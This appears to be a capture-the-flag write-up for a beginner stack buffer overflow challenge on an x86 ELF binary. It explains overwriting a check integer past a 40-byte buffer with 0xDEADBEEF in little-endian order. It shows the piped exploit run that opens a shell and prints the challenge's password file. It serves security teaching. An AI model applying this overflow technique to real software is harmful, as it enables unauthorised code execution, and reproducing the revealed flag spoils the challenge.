# 5. ELF x86 - Stack buffer overflow basic 1

If we read through the source code, we can see that there is a 40 byte buffer that we read into, and an integer right next to it. With a bit of experimentation, we find out that if we enter more than the size of the buffer into our input, it will overwrite the check integer. We need to set the integer to `0xDEADBEEF` and then the program will give us a shell. We can do this by creating a file with 40 bytes of anything and then our 4 integer bytes, keeping in mind that x86 is little endian, we need to write our bytes to the file in reverse order like so: `0xEFBEADDE`. You should pipe the file into the program such that you can input text into the program after reaching EOF like so:

```
$ cat /tmp/exploit - | ./ch13

[buf]: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxﾭ?
[check] 0xdeadbeef
Yeah dude! You win!
Opening your shell...
cat .passwd
1w4ntm0r3pr0np1s
```
